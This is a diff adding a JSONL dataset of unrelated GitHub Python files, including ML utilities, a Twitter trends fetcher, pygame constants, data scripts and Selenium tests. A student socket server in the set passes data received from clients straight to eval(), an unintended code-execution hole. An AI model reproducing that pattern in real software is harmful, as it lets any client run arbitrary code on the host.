diff --git "a/835.jsonl" "b/835.jsonl" new file mode 100644--- /dev/null +++ "b/835.jsonl" @@ -0,0 +1,1760 @@ +{"seq_id":"2300416612","text":"import os\n\nimport torch\nimport torch.optim as optim\n\nfrom utils import load_checkpoint\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\ndef get_optimizer(P, model):\n params = model.parameters()\n optimizer = optim.Adam(params, lr=P.lr)\n return optimizer\n\n\ndef is_resume(P, model, optimizer):\n if P.resume_path is not None:\n model_state, optim_state, config, lr_dict, ema_dict = load_checkpoint(P.resume_path, mode='last')\n model.load_state_dict(model_state, strict=not P.no_strict)\n optimizer.load_state_dict(optim_state)\n start_step = config['step']\n best = config['best']\n is_best = False\n acc = 0.0\n if lr_dict is not None:\n P.inner_lr = lr_dict\n if ema_dict is not None:\n P.moving_average = ema_dict\n else:\n is_best = False\n start_step = 1\n best = -100.0\n acc = 0.0\n return is_best, start_step, best, acc\n\n\ndef load_model(P, model, logger=None):\n if logger is None:\n log_ = print\n else:\n log_ = logger.log\n\n if P.load_path is not None:\n log_(f'Load model from {P.load_path}')\n checkpoint = torch.load(P.load_path)\n if P.rank != 0:\n model.__init_low_rank__(rank=P.rank)\n\n model.load_state_dict(checkpoint, strict=P.no_strict)\n","repo_name":"jaehyun513/STUNT","sub_path":"common/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"48"} +{"seq_id":"20014999900","text":"from tweepy import OAuthHandler\nfrom tweepy import API\nimport datetime\nimport DB_writer\nimport os\n\napi_key = os.environ['twitter_api_key']\napi_secret = os.environ['twitter_api_secret']\naccess_token = os.environ['twitter_access_token']\naccess_secret = os.environ['twitter_access_secret']\n\ndef get_trends():\n # Consumer key authentication(consumer_key,consumer_secret can be collected from our twitter developer profile)\n auth = OAuthHandler(api_key, api_secret)\n\n # Access key authentication(access_token,access_token_secret can be collected from our twitter developer profile)\n auth.set_access_token(access_token, access_secret)\n\n # Set up the API with the authentication handler\n api = API(auth)\n\n # Germany WOEID\n woeid = 23424829\n\n # Get trends\n trends = api.trends_place(woeid)\n trends = trends[0]['trends']\n now = datetime.datetime.now()\n trends = [{\"keyword\": t['name'], \"volume\": t['tweet_volume'], \"tmstmp\": now} for t in trends]\n\n for t in trends:\n DB_writer.insert_trends(t)","repo_name":"henrythier/news","sub_path":"twittertrends.py","file_name":"twittertrends.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"30455818013","text":"import pygame\n#Contains variables\n#Dimensions\nCELL_SIZE = 40\nCELL_NO_X = 20\nCELL_NO_Y = 20\nSMALL_FONT_SIZE = 25\nBIG_FONT_SIZE = 60\n\n#Direction\nMOVE_UP = \"up\"\nMOVE_DOWN = \"down\"\nMOVE_LEFT = \"left\"\nMOVE_RIGHT = \"right\"\n\n#Color\nBOARD_COLOR_BASE = (175, 215, 70)\nGRASS_COLOR = (167, 209, 61)\nSCORE_COLOR = (56, 74, 12)\nFONT_COLOR = (56, 74, 12)\n\n#Game specific constants\nFULL_BOARD = (CELL_NO_X * CELL_NO_Y) - 1 #just before the snake eats the last fruit, this is the snake's length\n\n#pygame specific constants\nBOARD_UPDATE_EVENT = pygame.USEREVENT\nMOVEMENT_MS_PER_EVENT = 
150","repo_name":"theAwesomeElmar/pygame-snake-practice","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37710928178","text":"from setuptools import setup, find_packages\n\nwith open(\"README.rst\", \"r\") as fh:\n long_description = fh.read()\n\n# Get the version.\nversion = {}\nwith open(\"pastas/version.py\") as fp:\n exec(fp.read(), version)\n\nsetup(\n name='pastas',\n version=version['__version__'],\n description='Python Applied System TimeSeries Analysis Software',\n long_description=long_description,\n long_description_content_type=\"text/x-rst\",\n url='https://github.com/pastas/pastas',\n author='R.A. Collenteur, M. Bakker, R. Calje, F. Schaars',\n author_email='raoulcollenteur@gmail.com, markbak@gmail.com, '\n 'r.calje@artesia-water.nl',\n project_urls={\n 'Source': 'https://github.com/pastas/pastas',\n 'Documentation': 'http://pastas.readthedocs.io/en/latest/',\n 'Tracker': 'https://github.com/pastas/pastas/issues',\n 'Help': 'https://stackoverflow.com/questions/tagged/pastas'\n },\n license='MIT',\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Science/Research',\n 'Intended Audience :: Other Audience',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6'\n ],\n platforms='Windows, Mac OS-X',\n install_requires=['numpy>=1.10', 'matplotlib>=1.5', 'pandas>=0.22',\n 'scipy>=1.0'],\n packages=find_packages(exclude=[]),\n package_data={\"pastas\": [\"log_config.json\"], },\n)\n","repo_name":"kbSSR/pastas","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"19201463341","text":"from PIL import Image\nimport numpy as np \nfrom matplotlib import pyplot as plt\n\nimg = Image.open(\"/path/to/file/image.tif\")\n\nr, g, b = img.split()\n\nhist_r = np.array(r.histogram())\nhist_r[:5] = hist_r[10] # :5 for the thredshold can be changed according to the need \nhist_g = np.array(g.histogram())\nhist_g[:5] = hist_g[10]\nhist_b = np.array(b.histogram())\nhist_b[:5] = hist_b[10]\nplt.plot((hist_r+hist_g),color = 'y')\nplt.plot(hist_r,color = 'r')\nplt.plot(hist_g,color = 'g')\nplt.plot(hist_b,color = 'b')\nplt.xlim([0,256])\nplt.show()\n\nRed = np.array(r)>100\nplt.imshow(Red)\n","repo_name":"BNMEZR/immunofluorescence_data","sub_path":"Histogram.py","file_name":"Histogram.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41866114829","text":"import pygame\nimport Texture\nimport math\n\n\ndef mip_map(texture, mips):\n for i in range(0, mips):\n surf = texture.texture\n a = int(surf.get_width()/2.0)\n b = int(surf.get_height()/2.0)\n surf.unlock()\n surf = pygame.transform.smoothscale(surf, (a, b))\n texture.texture = surf\n return texture\n","repo_name":"FelixWindisch/PyRayT","sub_path":"MipMap.py","file_name":"MipMap.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"14020092800","text":"from math import log10\nimport csv\n\ndef file2list(file):\n\tf = open(file,\"r\")\n\tdata = list()\n\tnext(f)\n\tfor line in f:\n\t\tline = line.strip(\"\\n\")\n\t\tl = line.split(\",\")\n\t\tdata.append(l)\n\treturn 
data\n\n\ndef psrcalc(file, nmin = 0, R = 0):\n\tdata = file2list(file)\n\n\tl = 0\n\tfor iter0 in data:\n\t\tif iter0[1] != \"diseases\":\n\t\t\tl += 1\n\n\tpsrdata = [[None] * 4] * l\n\tpara = [[None] * 6] * l\n\t\n\tk = 0\n\tfor iter1 in data:\n\t\tprobability = 0\n\t\tspecificity = 0\n\t\tif iter1[1] != \"diseases\":\n\n\t\t\tnco0 = int(iter1[3]) #Co occurence number\n\t\t\tnco1 = 0 #Total co occurence number\n\t\t\tctr0 = 0 #Occurence Number\n\t\t\tctr1 = 0 #Total occurence Number\n\n\t\t\tfor iter2 in data:\n\t\t\t\tif iter1[1] == iter2[1]:\n\t\t\t\t\tif iter1[0] == iter2[0]:\n\t\t\t\t\t\tctr0 += int(iter2[3])\n\t\t\t\t\tctr1 += int(iter2[3])\n\t\t\t\t\tif iter1[2] == iter2[2]:\n\t\t\t\t\t\tnco1 += int(iter2[3])\n\t\t\tprobability = nco0/ctr0\n\t\t\tspecificity = probability/(nco1/ctr1)\n\t\t\treliability = log10(max(1,1+nco0-nmin)) + R\n\t\t\tpsr = probability * specificity * reliability\n\n\t\t\t#Insert code for if it's diseases\n\t\t\tpara[k] = iter1\n\t\t\tpara[k].extend([psr, probability,specificity,reliability])\n\n\t\t\tpsrdata[k] = iter1[0:3] + iter1[4:5]\n\t\t\tk += 1\n\treturn psrdata, para\n\ndef postprocess(predata,psrcutoff = 0.22):\n\n\tpostdata = list()\n\n\tfor i in range(len(predata)):\n\t\tif predata[i][3] > psrcutoff:\n\t\t\tpostdata.append(predata[i])\n\t\t\t#predata[i].pop()\n\n\tprint(len(postdata),len(predata),sep = \",\")\n\treturn postdata\n\ndef data2file(data,file):\n\theaders = [\"sb\",\"pr\",\"ob\",\"wt\"] #Subject,Predicate,Object,Weight\n\n\twith open(file,\"w\") as file:\n\t\tW = csv.writer(file)\n\t\tW.writerow(headers)\n\t\tW.writerows(data)\n\npsr, para = psrcalc(\"data-5m.csv\", nmin = 5, R = 1)\nfinalpsr = postprocess(psr)\n\ndata2file(finalpsr,\"psrdata.csv\")","repo_name":"snehasaisneha/hkgpipeline","sub_path":"prelim_pipeline/psr_calc.py","file_name":"psr_calc.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73652333586","text":"def formatter(msg):\r\n\tif type(msg) is not bool:\r\n\t\tsmsg = msg.split(' :', 1)\r\n\t\tif len(smsg) == 2:\r\n\t\t\tnmsg = f'{smsg[0]}: {smsg[1]}'\r\n\t\t\treturn nmsg\r\n\t\treturn(msg)\r\n\telse:\r\n\t\treturn False\r\n\r\ndef formatterCmd(msg):\r\n\tdata = formatter(msg).split(': ') if type(msg) is not bool else False\r\n\t\r\n\tresponse = ''\r\n\r\n\tif type(data) == bool:\r\n\t\tresponse = {\r\n\t\t\t'user': 'bool',\r\n\t\t\t'method': 'error',\r\n\t\t\t'command': '',\r\n\t\t\t'message': '',\r\n\t\t\t'enabled': 'false'\r\n\t\t\t}\r\n\telif len(data) == 2 and not False:\r\n\t\tusr = data[0]\r\n\t\tres = data[1].split(' ', 1) if len(data) >= 1 else ['None', 'None']\r\n\t\tcmd = res[0]\r\n\t\texe = res[1] if len(res) > 1 else 'this is a message'\r\n\t\t#print(f'\"{usr}\" used the \"{cmd}\" command and got the \"{exe}\" response')\r\n\r\n\r\n\r\n\t\tif cmd[0] == '!':\r\n\t\t\tresponse = {\r\n\t\t\t\t\"user\": usr,\r\n\t\t\t\t\"method\": \"read\",\r\n\t\t\t\t\"command\": cmd,\r\n\t\t\t\t\"message\": \"reading command\",\r\n\t\t\t\t\"enabled\": True\r\n\t\t\t\t}\r\n\t\t\tif cmd == '!register':\r\n\t\t\t\tresponse = {\r\n\t\t\t\t\t\"user\": usr,\r\n\t\t\t\t\t\"method\": \"write\",\r\n\t\t\t\t\t\"command\": exe.split(' ', 1)[0],\r\n\t\t\t\t\t\"message\": exe.split(' ', 1)[1],\r\n\t\t\t\t\t\"enabled\": True\r\n\t\t\t\t\t}\r\n\t\telse:\r\n\t\t\tresponse = False\r\n\t\t\r\n\treturn 
response","repo_name":"vmdeom/xutasBot","sub_path":"formatter.py","file_name":"formatter.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42114883201","text":"import collections\nimport datetime\nimport json\n\nimport requests\n\nfrom nextbus import models\nfrom nextbus.populate import utils\n\n\nBANK_HOLIDAY_URL = r\"https://www.gov.uk/bank-holidays.json\"\nHOLIDAYS = [\n {\"holiday_id\": 1, \"name\": \"new year’s day\", \"region\": None, \"note\": None},\n {\"holiday_id\": 2, \"name\": \"2nd january\", \"region\": \"scotland\", \"note\": None},\n {\"holiday_id\": 3, \"name\": \"good friday\", \"region\": None, \"note\": None},\n {\"holiday_id\": 4, \"name\": \"easter monday\", \"region\": None, \"note\": None},\n {\"holiday_id\": 5, \"name\": \"early may bank holiday\", \"region\": None, \"note\": None},\n {\"holiday_id\": 6, \"name\": \"spring bank holiday\", \"region\": None, \"note\": None},\n {\"holiday_id\": 7, \"name\": \"summer bank holiday\", \"region\": \"england-and-wales\", \"note\": None},\n {\"holiday_id\": 8, \"name\": \"summer bank holiday\", \"region\": \"scotland\", \"note\": None},\n {\"holiday_id\": 9, \"name\": \"christmas day\", \"region\": None, \"note\": None},\n {\"holiday_id\": 10, \"name\": \"boxing day\", \"region\": None, \"note\": None},\n {\"holiday_id\": 11, \"name\": \"christmas day\", \"region\": None, \"note\": \"substitute day\"},\n {\"holiday_id\": 12, \"name\": \"boxing day\", \"region\": None, \"note\": \"substitute day\"},\n {\"holiday_id\": 13, \"name\": \"new year’s day\", \"region\": None, \"note\": \"substitute day\"},\n]\n\n\nHolidayDate = collections.namedtuple(\"HolidayDate\", (\"id\", \"date\"))\n\n\ndef _get_holiday_dates(data):\n try:\n divisions = data.values()\n except AttributeError:\n raise ValueError(\"The given data is not an object\")\n\n holiday_dates = set()\n for division in divisions:\n region = _get_property(division, \"division\")\n events = _get_property(division, \"events\")\n for event in events:\n holiday_date = _get_holiday(region, event)\n if holiday_date is not None:\n holiday_dates.add(holiday_date)\n\n years = set()\n for bh in holiday_dates:\n years.add(bh.date.year)\n\n for year in years:\n # The API provides bank holidays that will have been substituted if the\n # occasion (eg New Year's Day) fell on a weekend. 
Bus timetables will\n # require both dates so they will need to be infilled as well.\n holiday_dates.add(HolidayDate(1, datetime.date(year, 1, 1)))\n holiday_dates.add(HolidayDate(14, datetime.date(year, 12, 24)))\n holiday_dates.add(HolidayDate(9, datetime.date(year, 12, 25)))\n holiday_dates.add(HolidayDate(10, datetime.date(year, 12, 26)))\n holiday_dates.add(HolidayDate(15, datetime.date(year, 12, 31)))\n\n return holiday_dates\n\n\ndef _get_holiday(region, event):\n title = _get_property(event, \"title\").lower()\n notes = _get_property(event, \"notes\").lower()\n\n # Match the substitute days first so check in reverse order\n for match in reversed(HOLIDAYS):\n if (\n match[\"name\"] in title and\n (match[\"region\"] is None or match[\"region\"] == region) and\n (match[\"note\"] is None or match[\"note\"] in notes)\n ):\n break\n else:\n # No matches found\n return None\n\n date = _get_property(event, \"date\")\n try:\n dt = datetime.datetime.strptime(date, \"%Y-%m-%d\")\n except (ValueError, TypeError) as e:\n raise ValueError(\n f\"Invalid date for bank holiday {event['title']}\"\n ) from e\n\n return HolidayDate(match[\"holiday_id\"], dt.date())\n\n\ndef _get_property(obj, name):\n try:\n return obj[name]\n except TypeError as e:\n raise ValueError(f\"Expected an object\") from e\n except KeyError as e:\n raise ValueError(f\"Expected {name!r} property in object\") from e\n\n\ndef populate_holiday_data(connection, path=None):\n \"\"\" Retrieve and convert bank holiday data from the GOV.UK API and load them\n into the database.\n :param connection: Database connection for population.\n :param path: Path to JSON file. If this is None it will be downloaded.\n \"\"\"\n if path is not None:\n utils.logger.info(f\"Opening JSON file at {path!r}\")\n with open(path, \"r\") as f:\n data = json.load(f)\n else:\n utils.logger.info(f\"Downloading JSON data from {BANK_HOLIDAY_URL!r}\")\n data = requests.get(BANK_HOLIDAY_URL).json()\n\n try:\n holiday_dates = _get_holiday_dates(data)\n except ValueError as e:\n # Log error and exit; leave any existing bank holiday data alone\n utils.logger.error(f\"Failed to transform bank holiday data\", exc_info=e)\n return\n\n # Convert the holiday date data to rows and insert them\n rows = []\n for holiday_date in holiday_dates:\n rows.append({\n \"holiday_ref\": holiday_date.id,\n \"date\": holiday_date.date,\n })\n\n table = models.BankHolidayDate.__table__\n connection.execute(table.delete())\n connection.execute(table.insert().values(rows))\n utils.logger.info(\"Bank holiday date population done\")\n","repo_name":"macph/nextbus","sub_path":"src/nextbus/populate/holidays.py","file_name":"holidays.py","file_ext":"py","file_size_in_byte":4940,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"12728634625","text":"import logging\nimport os\n\nfrom server import Server\n\nserver = Server()\nenv_config = server.create_config()\n\napp = server.create_app(config=env_config)\ngunicorn_logger = logging.getLogger(\"gunicorn.error\")\napp.logger.handlers = gunicorn_logger.handlers\napp.logger.setLevel(gunicorn_logger.level)\napp.run(host=\"0.0.0.0\", debug=True, port=8080)\n","repo_name":"reyvb24/Aws-Hackathon","sub_path":"botelle/botelle_backend/server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1102258337","text":"from time import sleep\nfrom 
vue.shared.infrastructure.factories.driver_factory import get_chrome, close\nfrom vue.shared.infrastructure.facades.dom import Dom\nfrom vue.shared.infrastructure.facades.dropdown import Dropdown\nfrom vue.shared.infrastructure.facades.element import Element\nfrom vue.shared.infrastructure.generators.uuid import get_uuid\nfrom vue.shared.infrastructure.repositories.routes_repository import RoutesRepository\n\nfrom vue.shared.domain.element_enum import ElementEnum\nfrom vue.oco.login.application.login_service import login_usr1_or_fail\nfrom vue.oco.assets.infrastructure.repositories.assets_repository import AssetsRepository\nfrom vue.oco.assets.infrastructure.repositories.asset_material_attributes_repository import \\\n AssetMaterialAttributesRepository\n\n\ndef asset_create_product() -> None:\n login_usr1_or_fail()\n sleep(30)\n\n browser = get_chrome()\n browser.get(RoutesRepository.get_asset_add_url())\n dom = Dom(browser)\n sleep(3)\n\n __config_asset_type(dom)\n\n btn_id = AssetsRepository.get_id_button_save()\n btn_save = dom.find_by_id(btn_id)\n btn_save.click()\n close(30)\n\n\ndef __config_asset_type(dom: Dom) -> None:\n el = Element(dom)\n element_id = AssetsRepository.get_id_asset_code()\n uuid = get_uuid(4)\n value = f\"prd-{uuid}\"\n el.set_value(element_id, value)\n\n element_id = AssetsRepository.get_id_asset_name()\n value = f\"prd-{uuid}\"\n el.set_value(element_id, value)\n\n dd = Dropdown(dom)\n # tipo de asset\n btn_xpath = AssetMaterialAttributesRepository.get_sel_asset_type_product()\n li_xpath = AssetMaterialAttributesRepository.get_sel_asset_type_product(ElementEnum.LI_XPATH)\n dd.select_by_xpath(btn_xpath, li_xpath)\n","repo_name":"eacevedof/prj_python37","sub_path":"selenium/vue/oco/assets/application/asset_create_product_service.py","file_name":"asset_create_product_service.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"31471050852","text":"import pandas as pd\nfrom sklearn.model_selection import train_test_split\n\n\nclass IrisDataset:\n def __init__(self, dataset_path: str = \"dataset/iris.csv\") -> None:\n self.df = pd.read_csv(dataset_path,index_col=0)\n\n self.train, self.test = train_test_split(\n self.df, test_size=0.25, random_state=12345\n )\n","repo_name":"alphinside/example-dvc-dataset","sub_path":"example_dvc_dataset/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24429731120","text":"\"\"\"\nCASSANDRA CHAPUT\n2/21/2023\nCSCI-P434\nASSIGNMENT 2\n\nSERVER.PY\n\"\"\"\n\n\n\n#IMPORT STATEMENTS\nimport socket\n\n#GLOBAL DICTIONARY & LIST\nwc_list = []\nreduced_dict = {}\n\n# FUNCTION TO GET DATA FROM SOCKET\n# PARAMETER: SOCK(CONNECTION OF CLIENT)\n# RETURN DATA SENT BY CLIENT\ndef recvall(sock):\n BUFF_SIZE = 10 #1 KiB\n data = b''\n while True:\n chunk = sock.recv(BUFF_SIZE)\n data += chunk\n if len(chunk) < BUFF_SIZE:\n #EITHER 0 OR EOD\n break\n return data\n\n# FUNCTION TO MAP WORDCOUNT OF FILE\ndef map_wc(doc_id):\n wc_list.clear()\n with open(doc_id, 'r') as doc:\n for line in doc: \n line.strip()\n #print(\"LINE: \", line)\n for word in list(line.split(\" \")): \n word = word.lower()\n word = word.replace(\",\", \"\")\n word = word.replace(\".\", \"\")\n word = word.replace(\";\", \"\")\n word = word.replace(\"!\", \"\")\n word = word.replace(\"?\", \"\")\n tup = tuple((word.strip(), 1))\n 
wc_list.append(tup)\n #print(\"WORD: \", word)\n conn.sendall(f\"{wc_list}\".encode())\n return wc_list\n\ndef set(dictionary, key, value):\n if key in dictionary.keys():\n dictionary[key] = dictionary[key]+value\n else:\n dictionary[key] = value\n return dictionary\n\n# FUNCTION TO REDUCE \ndef run_mapred(input_data, output_location):\n reduced_dict.clear()\n res = eval(input_data)\n for t in res:\n #print(t)\n #print(type(t))\n set(reduced_dict, t[0], t[1])\n \n # CREATE OUTPUT FILE\n text = str(list(reduced_dict.items()))\n output_file = open(output_location, 'w')\n output_file.write(text)\n output_file.close()\n\n conn.sendall(f\"{reduced_dict}\".encode())\n return reduced_dict\n\n# FUNCTION FOR INVERT INDEX\ndef invert_index(file_list, output_location):\n mult_file_wc = {}\n for file_name in file_list:\n f = open(file_name, 'r').read()\n wc = eval(f)\n for item in wc:\n mult_file_wc = set(mult_file_wc, item[0], item[1])\n \n # CREATE OUTPUT FILE\n output_file = open(output_location, 'w')\n text = str(list(mult_file_wc.items()))\n output_file.write(text)\n output_file.close()\n\n conn.sendall(f\"{mult_file_wc}\".encode())\n return mult_file_wc\n\n\nif __name__ == '__main__':\n #DEFINE SERVER ADDRESS\n HOST = \"127.0.0.1\"\n PORT = 9889\n\n #DEFINE CMD, KEY & VALUE\n cmd = ''\n key =''\n value = ''\n\n #BIND SERVER TO ADDY AND LISTEN FOR CLIENT\n s = socket.socket()\n s.bind((HOST, PORT))\n s.listen()\n\n while True:\n conn, addr = s.accept()\n print(f\"CONNECTED BY {addr}\")\n\n #GET DATA FROM CLIENT\n #data = conn.recv(1024)\n data = recvall(conn)\n\n #PRINT RECIEVED DATA\n print(f\"ADDRESS {addr} \\n CMD: {data.decode()}\")\n\n #DETERMIND CMD & KEY\n l = list(data.decode().split(\": \"))\n cmd = l[0]\n\n # SET KEY VALUE IN FUNC SET()\n if cmd == \"map_wc\":\n map_wc(l[1])\n elif cmd == \"run_mapred\":\n l1 = list(l[1].split(\" OUTPUT_LOCATION:\"))\n input_data = l1[0]\n #print(\"TYPE OF INPUT_DATA IS \", type(input_data))\n output_location = l1[1] \n run_mapred(input_data, output_location)\n elif cmd == \"invert_index\":\n l1 = list(l[1].split(\" OUTPUT_LOCATION:\"))\n output_location = l1[1]\n file_list = list(l1[0].split(\" \"))\n #print(f\"\\nFILE LIST:{file_list[0]} {file_list[1]} {file_list[2]}\\n\\n\")\n file_dict = {}\n for f in file_list:\n file_dict[f] = None\n invert_index(file_dict, output_location)\n\n","repo_name":"chaput200/P434","sub_path":"DS_A2/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25519611459","text":"# 스파이들은 매일 다른 옷을 조합하여 입어 자신을 위장합니다.\n#\n# 예를 들어 스파이가 가진 옷이 아래와 같고 오늘 스파이가 동그란 안경, 긴 코트, 파란색 티셔츠를 입었다면\n# 다음날은 청바지를 추가로 입거나 동그란 안경 대신 검정 선글라스를 착용하거나 해야 합니다.\n# 종류 \t이름\n# 얼굴 \t동그란 안경, 검정 선글라스\n# 상의 \t파란색 티셔츠\n# 하의 \t청바지\n# 겉옷 \t긴 코트\n#\n# 스파이가 가진 의상들이 담긴 2차원 배열 clothes가 주어질 때 서로 다른 옷의 조합의 수를 return 하도록 solution 함수를 작성해주세요.\n# 제한사항\n#\n# clothes의 각 행은 [의상의 이름, 의상의 종류]로 이루어져 있습니다.\n# 스파이가 가진 의상의 수는 1개 이상 30개 이하입니다.\n# 같은 이름을 가진 의상은 존재하지 않습니다.\n# clothes의 모든 원소는 문자열로 이루어져 있습니다.\n# 모든 문자열의 길이는 1 이상 20 이하인 자연수이고 알파벳 소문자 또는 '_' 로만 이루어져 있습니다.\n# 스파이는 하루에 최소 한 개의 의상은 입습니다.\n\n# 의상이름-key, 의상종류-value로 딕셔너리 생성\ndef first_solution(clothes):\n # dict_cloths = {}\n # answer = 0\n # 딕셔너리 안쓰고 그대로\n # for i, cloth in enumerate(clothes):\n # dict_cloths[i] = cloth[1]\n\n cloths_number = len(clothes)\n cloth_combination = []\n\n for i in range(1 << cloths_number):\n comb_temp = []\n kind_temp = []\n for j in range(cloths_number):\n if i & (1 
<< j):\n if clothes[j][1] not in kind_temp:\n kind_temp.append(clothes[j][1])\n comb_temp.append(j)\n\n if comb_temp not in cloth_combination:\n cloth_combination.append(comb_temp)\n\n print(cloth_combination)\n cloth_combination.pop(0)\n answer = len(cloth_combination)\n\n return answer\n\n # for comb in cloth_combination:\n # cnt = Counter(comb)\n # max_value = max(list(cnt.values()))\n # if max_value >= 2:\n # answer -= 1\n\ndef solution(clothes): # best solution\n # 옷의 종류별로 (옷종류갯수+벗은상황)*(옷종류갯수+벗은상황1)*... - 1(아무것도 안입었을때\n # 종류(키): 옷(벨류) 로 딕셔너리 생성\n # 각 딕셔너리 항목별 갯수+1을 다 곱해주고 마지막에 - 1\n answer = 1\n dic = {}\n for cloth, ctype in clothes:\n if not dic.get(ctype):\n dic[ctype] = [cloth]\n else:\n dic[ctype].append(cloth)\n\n for c_type in dic:\n answer *= len(dic[c_type]) + 1\n\n return answer - 1\n\n\n\np_list = [[\"yellowhat\", \"headgear\"], [\"bluesunglasses\", \"eyewear\"], [\"green_turban\", \"headgear\"]]\n\nprint(solution(p_list))\n\n\ndef best_solution(clothes):\n from collections import Counter\n from functools import reduce # reduce(집계함수, 순회가능 데이터,[,초기값]) 집계함수는 lambda 누적자(x,y): 집계함수(x*(y+1)), 순회데이터, 초기값) 형태\n cnt = Counter([kind for name, kind in clothes])\n answer = reduce(lambda x, y: x*(y+1), cnt.values(), 1) - 1\n return answer","repo_name":"Enin/codingTest","sub_path":"Programmers/Hash/P3_spy.py","file_name":"P3_spy.py","file_ext":"py","file_size_in_byte":3284,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20564276523","text":"#!/usr/bin/python2\n\nusage='''\n Usage: python lenDist.py [--image] /path/to/sample_output_directory\n\n Output saved as lenDist.csv, and possibly lenDistHistograme.png\n\n Description:\n Calculates the read length distribution post-trimming across all samples.\n If the --image flag is provided, will out put a read length histogram for\n each sample. 
For small RNA-seq, we expect to see a peak around 21-22, as\n these are the miRNAs.\n\n'''\n \n\nimport sys\nimport argparse\nimport os\nimport f_utils\n\n\ndef read_lengths_dict(samples):\n '''\n Load the length distribution data into a dictionary\n '''\n out_di = {}\n lengths = {}\n for file in samples:\n with open(file, 'r') as fi:\n name = fi.readline().rstrip().split('\\t')[1]\n out_di[name] = {}\n for l in fi:\n a, b = l.rstrip().split('\\t')\n out_di[name][a] = b\n lengths[a] = 1\n return out_di, sorted(lengths)\n\n\ndef write_length_distribution(outPath, len_di, lengths):\n '''\n Calculate read length ratio and write to output fore each sample\n '''\n output_name = '{}{}'.format(outPath, 'length_distribution.csv')\n with open(output_name, \"w\") as f:\n f.write('Length,{}\\n'.format(','.join(sorted(len_di))))\n for len in lengths:\n f.write(len)\n for sample in sorted(len_di):\n try:\n f.write(',{}'.format(len_di[sample][len]))\n except KeyError:\n f.write(',0')\n f.write('\\n')\n return output_name\n\n\ndef create_length_dist_image(out_dir, out_name):\n '''\n Using R, creates a length distribution image for each sample\n '''\n os.system('Rscript --vanilla {}/lenDistGraph.R {}'.format(out_dir, out_name))\n \n\ndef main(outPath, samples):\n samples = f_utils.set_path_to_files_glob(samples, 'ead_length_histo')\n len_di, lengths = read_lengths_dict(samples)\n out_name = write_length_distribution(outPath, len_di, lengths)\n create_length_dist_image(os.path.dirname(__file__), out_name)\n\n\nif __name__ == '__main__':\n f_utils.check_for_input(sys.argv, usage)\n parser = argparse.ArgumentParser(\n description='Analyzed the length distribution of trimmed reads')\n parser.add_argument(\n 'outPath', \n action='store', \n help='Path to where the output file will be located')\n parser.add_argument(\n 'samples', \n action='store', \n nargs='+',\n help='Path to where the sample output folders are located')\n arg = parser.parse_args()\n main(arg.outPath, arg.samples)\n","repo_name":"Sethupathy-Lab/miRquant","sub_path":"bin/final_analysis/lenDist.py","file_name":"lenDist.py","file_ext":"py","file_size_in_byte":2652,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"10793475606","text":"import logging\nfrom typing import Any, Dict, Mapping, Optional, Union\n\nimport great_expectations.exceptions as ge_exceptions\nfrom great_expectations.core import ExpectationSuite\nfrom great_expectations.data_context.data_context.abstract_data_context import (\n AbstractDataContext,\n)\nfrom great_expectations.data_context.data_context_variables import (\n EphemeralDataContextVariables,\n)\nfrom great_expectations.data_context.types.base import DataContextConfig\nfrom great_expectations.data_context.types.resource_identifiers import (\n ExpectationSuiteIdentifier,\n)\n\nlogger = logging.getLogger(__name__)\n\n\nclass EphemeralDataContext(AbstractDataContext):\n \"\"\"\n Will contain functionality to create DataContext at runtime (ie. passed in config object or from stores). 
Users will\n be able to use EphemeralDataContext for having a temporary or in-memory DataContext\n\n TODO: Most of the BaseDataContext code will be migrated to this class, which will continue to exist for backwards\n compatibility reasons.\n \"\"\"\n\n def __init__(\n self,\n project_config: Union[DataContextConfig, Mapping],\n runtime_environment: Optional[dict] = None,\n ) -> None:\n \"\"\"EphemeralDataContext constructor\n\n project_config: config for in-memory EphemeralDataContext\n runtime_environment: a dictionary of config variables tha\n override both those set in config_variables.yml and the environment\n\n \"\"\"\n self._project_config = self._apply_global_config_overrides(\n config=project_config\n )\n self._config_variables = self._load_config_variables()\n self._variables = self._init_variables()\n super().__init__(runtime_environment=runtime_environment)\n\n def _init_variables(self) -> EphemeralDataContextVariables:\n variables: EphemeralDataContextVariables = 